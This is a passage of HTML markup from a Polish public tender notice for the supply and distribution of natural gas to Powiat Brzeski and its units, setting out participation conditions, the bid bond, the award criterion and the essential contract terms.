POSTĘPOWANIU </b> <br/> <div style="padding-left: 20px"> <b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_okreslenie_warunkow">kompetencji lub uprawnień do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów. Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże się posiadaniem: aktualnie obowiązującej koncesji na prowadzenie działalności gospodarczej w zakresie obrotu paliwami gazowymi, wydaną przez Prezesa Urzędu Regulacji Energetyki zgodnie z wymogami ustawy z dnia 10 kwietnia 1997 r. Prawo energetyczne</span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_okreslenie_warunkow"></span> <br/> <b>III.1.2) Sytuacja finansowa lub ekonomiczna </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_okreslenie_warunkow">Zamawiający nie określił warunku w powyższym zakresie</span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_informacje_dodatkowe"></span> <br/> <b>III.1.3) Zdolność techniczna lub zawodowa </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_okreslenie_warunkow">Zamawiający uzna, że warunek został spełniony, jeżeli Wykonawca:wykaże się wykonaniem w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, a w przypadku świadczeń okresowych lub ciągłych również wykonywaniem, co najmniej dwóch dostaw gazu ziemnego wysokometanowego typu E o wielkości co najmniej 2 000 000 kWh (dwa miliony) w skali roku dla każdego odbiorcy.</span> <br/> Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób: <span id="ctl00_ContentPlaceHolder1_czy_zdolnosc_techniczna_wymaga_wykonawcow">Nie</span> <br/> Informacje dodatkowe: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_informacje_dodatkowe"></span> </div> <b> III.2) PODSTAWY WYKLUCZENIA </b> <br/> <div style="padding-left: 20px"> <b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1 ustawy Pzp</b> <br/> <b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b> <span id="ctl00_ContentPlaceHolder1_czy_zamawiajacy_przewiduje_wykluczenie">Tak</span> Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia: <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_1">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_2"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_3"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_4"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_5"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_6"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_7"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_8"></span> <br/> </div> <b> III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI </b> <br/> <div style="padding-left: 20px"> <b> Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_niepodleganiu_wykluczenia">Tak</span> <br/> <b> Oświadczenie o spełnianiu kryteriów selekcji </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_spelnienie_kryteriow">Nie</span> </div> <b> III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP: </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_dokumentow_zaswiadczen"></span> </div> <b> III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_warunkow_udzialu">a)	aktualnej koncesji na prowadzenie działalności gospodarczej w zakresie:•	obrotu (sprzedaży) paliwem gazowym wydaną przez Prezesa Urzędu Regulacji Energetyki; b)	wykazu dostaw wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy zostały wykonane oraz załączeniem dowodów określających czy te dostawy zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego dostawy były wykonywane, a w przypadku świadczeń okresowych lub ciągłych są wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów – oświadczenie wykonawcy; w przypadku świadczeń okresowych lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wydane nie wcześniej niż 3 miesiące przed upływem terminu składania ofert. Wykaz sporządza się według wzoru stanowiącego załącznik nr 5 do SIWZ z uwzględnieniem warunków określonych przez Zamawiającego w rozdziale V pkt 1.2.3) SIWZ.</span> <br/> <b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_kryteriow_selekcji"></span> </div> <b> III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_potwierdzenie_okolicznosci"></span> </div> <b> III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6) </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_inne_dokumenty_niewymienione">4.	Wykonawca, w terminie 3 dni od dnia zamieszczenia na stronie internetowej informacji z otwarcia ofert, o której mowa w art. 86 ust. 5 PZP, przekazuje Zamawiającemu oświadczenie o przynależności lub braku przynależności do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 1 pkt 23 PZP. Wraz ze złożeniem oświadczenia, wykonawca może przedstawić dowody, że powiązania z innym wykonawcą nie prowadzą do zakłócenia konkurencji w postępowaniu o udzielenie zamówienia. Wzór oświadczenia stanowi załącznik nr 4 do SIWZ.5.	Jeżeli osoba/osoby podpisująca ofertę, działa na podstawie pełnomocnictwa, to pełnomocnictwo to musi w swej treści jednoznacznie wskazywać uprawnienie do podpisania oferty. Pełnomocnictwo to musi zostać dołączone do oferty i musi być złożone w oryginale lub kopii poświadczonej notarialnie za zgodność z oryginałem.5.	Wykonawca, który polega na zdolnościach innych podmiotów, musi udowodnić Zamawiającemu, że realizując zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów, w szczególności przedstawiając zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji zamówienia. Zobowiązanie, o którym mowa w zdaniu poprzednim wykonawca zobowiązany jest złożyć wraz z ofertą.6.	Dokumenty lub oświadczenia, o których mowa w Rozdz. VI.4 oraz Rozd.VI.5 SIWZ, składane są w oryginale lub kopii poświadczonej za zgodność z oryginałem. 7.	Oświadczenia, o których mowa w Rozdz.VI.1 SIWZ, składa się, pod rygorem nieważności, w formie pisemnej, opatrzone własnoręcznym podpisem.8.	Poświadczenia za zgodność z oryginałem dokonuje odpowiednio Wykonawca, podmiot, na którego zdolnościach polega Wykonawca, Wykonawcy wspólnie ubiegający się o udzielenie zamówienia publicznego albo Podwykonawca, w zakresie dokumentów lub oświadczeń, które każdego z nich dotyczą.9.	Poświadczenie za zgodność z oryginałem następuje przez opatrzenie kopii dokumentu lub kopii oświadczenia, sporządzonych w postaci papierowej, własnoręcznym podpisem.10.	Dokumenty sporządzone w języku obcym winny być składane wraz z tłumaczeniem na język polski. 11.	Wszystkie składane dokumenty muszą być czytelne, o treści nie budzących wątpliwości interpretacyjnych.</span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA IV: PROCEDURA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>IV.1) OPIS </b> <br/> <b>IV.1.1) Tryb udzielenia zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_tryb_udzielenia_zamowienia">Przetarg nieograniczony</span> <br/> <b>IV.1.2) Zamawiający żąda wniesienia wadium:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wadium">Tak</span> <br/> Informacja na temat wadium <br/> <span id="ctl00_ContentPlaceHolder1_wadium">Zamawiający żąda wniesienia wadium w wysokości 15 000,00 złotych (słownie: piętnaście tysięcy złotych 00/100)2.	Wadium wnosi się przed upływem terminu składania ofert.3.	Wadium może być wnoszone w jednej lub kilku następujących formach:a)	Pieniądzu,b)	Poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo- kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,c)	Gwarancjach bankowych,d)	Gwarancjach ubezpieczeniowych,e)	Poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z 9.11.2000r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2019r., poz. 310, z późn. zm.)4.	Wadium wnoszone w pieniądzu wpłaca się przelewem na poniżej wskazany rachunek bankowy Zamawiającego:Nr konta: PKO BP SA O/Brzesko nr konta : 03 1020 2892 0000 5802 0678 2637, z dopiskiem „Wykonanie kompleksowej dostawy gazu ziemnego wysokometanowego typu E wraz z usługą dystrybucji na potrzeby Powiatu Brzeskiego wraz z jednostkami organizacyjnymi i budżetowymi”.5. Wadium w formie niepieniężnej powinno być wniesione w oryginale.6. Jeżeli wadium jest wnoszone w formie gwarancji bankowej lub ubezpieczeniowej albo w postaci poręczeń, to z ich treści musi wynikać bezwarunkowe, nieodwołalne i na pierwsze pisemne żądanie Zamawiającego, zobowiązanie gwaranta/poręczyciela do zapłaty na rzecz Zamawiającego kwoty określonej w gwarancji/poręczeniu.</span> </div> <br/> <b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zaliczek">Nie</span> <br/> Należy podać informacje na temat udzielania zaliczek: <br/> <span id="ctl00_ContentPlaceHolder1_przewiduje_udzielenie_zaliczek"></span> </div> <br/> <b> IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_zlozenie_katalogow_elektronicznych_informacje_dodatkowe"></span> </div> <br/> <b> IV.1.5.) Wymaga się złożenia oferty wariantowej: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_oferty_wariantowej">Nie</span> <br/> Dopuszcza się złożenie oferty wariantowej <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej">Nie</span> <br/> Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej_zasadniczej">Nie</span> </div> <br/> <b> IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu </b> <br/> <i> (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne) </i> <div style="padding-left: 20px"> Liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_liczba_wykonawcow"></span> <br/> Przewidywana minimalna liczba wykonawców <span id="ctl00_ContentPlaceHolder1_minimalna_liczba_wykonawcow"></span> <br/> Maksymalna liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_wykonawcow"></span> <br/> Kryteria selekcji wykonawców: <br/> <span id="ctl00_ContentPlaceHolder1_znaczenie_warunkow_wykonawcow"></span> </div> <br/> <b> IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów: </b> <div style="padding-left: 20px"> Umowa ramowa będzie zawarta: <br/> <span id="ctl00_ContentPlaceHolder1_z_kim_umowa_bedzie_zawarta"></span> <br/> Czy przewiduje się ograniczenie liczby uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_ograniczenie_liczby_uczestnikow"></span> <br/> Przewidziana maksymalna liczba uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow_informacje_dodatkowe"></span> <br/> Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_obejmuje_ustanowienie"></span> <br/> Adres strony internetowej, na której będą zamieszczone dodatkowe informacje dotyczące dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie_informacje_dodatkowe"></span> <br/> W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_umowy_ramowej_dynamicznego_katalogow"></span> <br/> Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_pobranie_umowy_ramowej_dynamicznego_katalogow"></span> </div> <br/> <b>IV.1.8) Aukcja elektroniczna </b> <br/> <b> Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i> <span id="ctl00_ContentPlaceHolder1_aukcja_elektroniczna">Nie</span> <br/> Należy podać adres strony internetowej, na której aukcja będzie prowadzona: <br/> <span id="ctl00_ContentPlaceHolder1_adres_strony_na_ktorej_bedzie_prowadzona"></span> <br/> <b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b> <span id="ctl00_ContentPlaceHolder1_elementy_aukcji_elektronicznej"></span> <br/> <b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b> <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenia_do_przedstawianych_wartosci"></span> <br/> Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie termin ich udostępnienia: <span id="ctl00_ContentPlaceHolder1_informaje_udostepnione_wykonawcom"></span> <br/> Informacje dotyczące przebiegu aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_informaje_przebiegu_aukcji"></span> <br/> Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): <span id="ctl00_ContentPlaceHolder1_warunki_do_licytacji"></span> <br/> Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń: <span id="ctl00_ContentPlaceHolder1_wykorzystanie_sprzetu_elektronicznego"></span> <br/> Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_wymagania_dotyczace_rejestracji_wyk_aukcja"></span> <br/> Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa"></span> <br/>Czas trwania: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa_czas"></span> <br /> <br/> Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_wykonawcy_zakwalfikowani"></span> <br/> Warunki zamknięcia aukcji elektronicznej: <br/> <span id="ctl00_ContentPlaceHolder1_warunki_zamkniecia_aukcji"></span> </div> <br/> <b>IV.2) KRYTERIA OCENY OFERT </b> <br/> <b>IV.2.1) Kryteria oceny ofert: </b> <br/> <b>IV.2.2) Kryteria</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kryteria</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Znaczenie</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>cena</TD><TD style='border: 1px solid black;border-collapse: collapse;'>100,00</TD></TR></TABLE> <br/> <b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony) <br/> <span id="ctl00_ContentPlaceHolder1_zastosowanie_procedury_pzp">Nie</span> <br/> <b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b> <br/> <b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b> <br/> Minimalne wymagania, które muszą spełniać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_minimalne_wymagania"></span> <br/> Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziane_jest_zastrzezenie"></span> <br/> Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert: <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziany_podzial"></span> <br/> Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów): <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_etapy_negocjacji"></span> <br/> Informacje dodatkowe <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_dodatkowe_informacje"></span> <br/> <br/> <b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b> <br/> Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_opis_potrzeb"></span> <br/> Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_informacja_wysokosc_nagrod"></span> <br/> Wstępny harmonogram postępowania: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_wstepny_harmonogram"></span> <br/> Podział dialogu na etapy w celu ograniczenia liczby rozwiązań: <span id="ctl00_ContentPlaceHolder1_IV_3_2_PodzialDialogu"></span> <br/> Należy podać informacje na temat etapów dialogu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_EtapyDialogu"></span> <br/> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_DodatkoweInformacje"></span> <br/> <b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b> <br/> Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_ElementyOpisu"></span> <br/> Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_PodzialNegocjacji"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_DodatkoweInfo"></span> <br/> <b>IV.4) Licytacja elektroniczna </b> <br/> Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_6"></span> </div> Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_7"></span> </div> Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_8"></span> </div> Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_9"></span> </div> Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa"></span> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa_czas"> Czas trwania: </span> <br /> <br/> Wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_4_10_wykonawcy_zakwalfikowani"></span> </div> Termin składania wniosków o dopuszczenie do udziału w licytacji elektronicznej: <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_11_data"></span> godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_11_godzina"></span> <br/> Termin otwarcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_12"></span> </div> Termin i warunki zamknięcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_13"></span> </div> <br/> Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_IstotnePostanowienia"></span> </div> <br/> Wymagania dotyczące zabezpieczenia należytego wykonania umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_14"></span> </div> <br/> Informacje dodatkowe: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_LicytacjeDodatkoweInformacje"></span> </div> <b>IV.5) ZMIANA UMOWY</b> <br/> <b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy">Tak</span> <br/> Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian: <br/> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy_tekst">ISTOTNE POSTANOWIENIA UMOWY na zadanie pn. WYKONANIE KOMPLEKSOWEJ DOSTAWY GAZU ZIEMNEGO WYSOKOMETANOWEGO TYPU E WRAZ Z USŁUGĄ DYSTRYBUCJI NA POTRZEBY POWIATU BRZESKIEGO WRAZ Z JEDNOSTKAMI ORGANIZACYJNYMI I BUDŻETOWYMI1.	Postanowienia ogólne1)	Przedmiotem umowy jest WYKONANIE KOMPLEKSOWEJ DOSTAWY GAZU ZIEMNEGO WYSOKOMETANOWEGO TYPU E WRAZ Z USŁUGĄ DYSTRYBUCJI NA POTRZEBY POWIATU BRZESKIEGO WRAZ Z JEDNOSTKAMI ORGANIZACYJNYMI I BUDŻETOWYMI.2)	Wybrany Wykonawca winien przedstawić Zamawiającemu w terminie do 5 dni od dnia rozstrzygnięcia postępowania Wzór Umowy kompleksowej dostawy gazu ziemnego zgodny z IRiESD, IRiESP oraz powszechnie obowiązującymi przepisami prawa. W razie sprzeczności poniższych postanowień z zapisami wzorów umów stosowanych przez Wykonawców pierwszeństwo mają zapisy Istotnych postanowień umowy.3)	Umowa zostanie zawarta w wyniku postępowania o zamówienie publiczne prowadzonego w oparciu o przepisy ustawy z dn. 29 stycznia 2004 r. Prawo zamówień publicznych ( Dz. U. z 2019 r. poz. 1843), w trybie przetargu nieograniczonego, dla zamówień o wartości szacunkowej poniżej kwoty określonej w przepisach wydanych na podstawie art. 11 ust. 8 Ustawy Pzp. 4)	Umowa zostanie zawarta na czas określony, tj. od 01.03.2020 r. do 28.02.2021 r.5)	Integralną częścią umowy jest oferta Wykonawcy z dnia (dzień składania ofert).6)	Oprócz istotnych postanowień umownych, umowa z Wykonawcą zawierać będzie również elementy wynikające z ustawy z dnia 10 kwietnia 1997 r Prawo energetyczne (Dz. U. z 2019 r. poz. 755 z późn. zm.)7)	Sprzedaż gazu ziemnego oraz świadczenie usługi przesyłania i dystrybucji odbywa się na warunkach określonych przepisami ustawy z dnia 10 kwietnia 1997 r. Prawo energetyczne ( Dz. U. z 2019 r. poz. 755 z późn.zm.), przepisami Kodeksu Cywilnego, postanowieniami niniejszej Umowy, zgodnie z Taryfą Operatora Systemu Dystrybucyjnego – PSG Sp. z o.o. dla usług dystrybucji paliw gazowych i usług regazyfikacji skroplonego gazu dla odpowiedniej grupy taryfowej. 8)	Wykonawca nie będący OSD oświadcza, że ma zawartą umowę ramową na przesył paliwa gazowego z OSD, umożliwiającą sprzedaż gazu do obiektów Zamawiającego za pośrednictwem sieci dystrybucyjnej OSD przez okres wskazany w ppkt 4. W przypadku, gdy okres obowiązywania umowy ramowej jest krótszy niż wskazany w ppkt 4 Wykonawca obowiązany jest przedłożyć Zamawiającemu oświadczenie o posiadaniu aktualnej umowy ramowej z OSD. Wykonawca oświadcza również, że przez cały okres obowiązywania umowy będzie posiadał koncesję w zakresie obrotu paliwami gazowymi wydaną przez Prezesa Urzędu Regulacji Energetyki. W przypadku , gdy okres obowiązywania niniejszej Umowy jest dłuższy niż ważność dokumentów opisanych powyżej, Wykonawca zobligowany jest w terminie nie późniejszym niż na trzy miesiące przed data upływu ważności tych dokumnetów, przedłożyć Zamawiającemu: oświadczenie o posiadanej aktulanej umowy ramowej zawartej z OSD i aktulanej koncesji na obrót paliwami gazowymi.9)	Wykonawca zobowiązuje się do sprzedaży gazu ziemnego i zapewnia jego dystrybucję do urządzeń i obiektów wskazanych w Załączniku nr 1 do SIWZ. Zamawiający oświadcza, że dysponuje tytułem prawnym do korzystania z obiektów, do których na podstawie Umowy będzie dostarczane paliwo gazowe.10)	Wykonawca zobowiązuje się dostarczać paliwo gazowe, gaz ziemny wysokometanowy E o ciśnieniu do 0,5 MPa włącznie do instalacji znajdujących się w obiektach Zamawiającego wyszczególnionych w Załączniku nr 1 do SIWZ11)	Wykonawca zawrze umowy na kompleksową dostawę gazu ziemnego i świadczenie usług dystrybucji z następującymi jednostkami: •	Dom Dziecka w Jasieniu•	Młodzieżowy Ośrodek Socjoterapii w Łysej Górze•	Powiatowy Urząd Pracy w Brzesku•	Środowiskowy Dom Samopomocy im. Św. Matki Teresy z Kalkuty w Łysej Górze•	Zarząd Dróg Powiatowych w Brzesku•	Specjalny Ośrodek Szkolno-Wychowawczy w Złotej•	Zespół Szkół Ponadpodstawowych nr 1 w Brzesku•	Zespół Szkół Technicznych i Branżowych im. Bohaterów Westerplatte w Brzesku•	Zespół Szkół w Czchowie•	Komenda Powiatowa Państwowej Straży Pożarnej w Brzesku12)	Łączną ilość paliwa gazowego, która będzie dostarczona w okresie obowiązywania Umowy do punktów poboru określonych w załączniku nr 1 do Umowy prognozuje się na poziomie 3 952 575 kWh. Powyższa wartość wolumenu gazu jest wartością szacowaną i może ulec zmianie. 13)	Ewentualna zmiana prognozowanego zużycia nie będzie skutkowała dodatkowymi kosztami dla Zamawiającego, poza rozliczeniem za faktyczne zużyte paliwo gazowe wg cen określonych w dokumentacji przetargowej i niniejszej Umowie oraz rozliczeniem za usługi dystrybucji pobieranego paliwa gazowego, wg obowiązującej w danym okresie Taryfy Operatora Systemu Dystrybucyjnego, do sieci którego Zamawiający jest przyłączony. 14)	Wykonawca będzie dostarczał, w okresie obowiązywania Umowy, paliwo gazowe w ilości odpowiadającej rzeczywistemu zapotrzebowaniu Zamawiającego, niezależnie od szacunkowej prognozy jego zużycia.15)	Wykonawca zobowiązuje się do sprzedaży gazu ziemnego z zachowaniem obowiązujących standardów jakościowych, określonych w Taryfie OSD, Prawie energetycznym oraz 